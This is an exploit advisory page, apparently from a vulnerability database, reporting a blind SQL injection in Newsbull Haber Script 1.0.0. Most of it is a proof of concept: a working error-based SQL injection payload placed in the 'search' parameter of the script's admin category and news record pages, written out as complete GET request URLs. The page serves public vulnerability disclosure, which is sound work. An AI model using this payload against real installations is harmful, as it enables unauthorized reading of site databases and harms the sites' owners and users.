Newsbull Haber Script 1.0.0 - SQL Injection (Blind)

2019.01.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################################### # Exploit Title: Newsbull Haber Script 1.0.0 - SQL Injection # Dork: N/A # Date: 28-01-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://newsbull.org/ # Demo Page : http://newsbull.gurkanuzunca.com/ # Software Link: https://github.com/gurkanuzunca/newsbull # Version: 1.0.0 # Category: Webapps # Tested on: Wampp @Win # CVE: N/A #################################################################### # Vulnerabilities # For the SQL injection to be applied, the user must log in. # Running the injection command in the POC section will display the db data. # The proof of the deficit is in the link below. # https://i.hizliresim.com/LlOBQz.jpg #################################################################### # POC - SQLi (Blind) # Parameters : search # Attack Pattern : -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' # GET Request : http://localhost/newsbull/admin/category/records?search=1'[SQL] # GET Request : http://localhost/newsbull/admin/news/records?search=1' [SQL] # URL : http://localhost/newsbull/admin/category/records?search=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' ####################################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top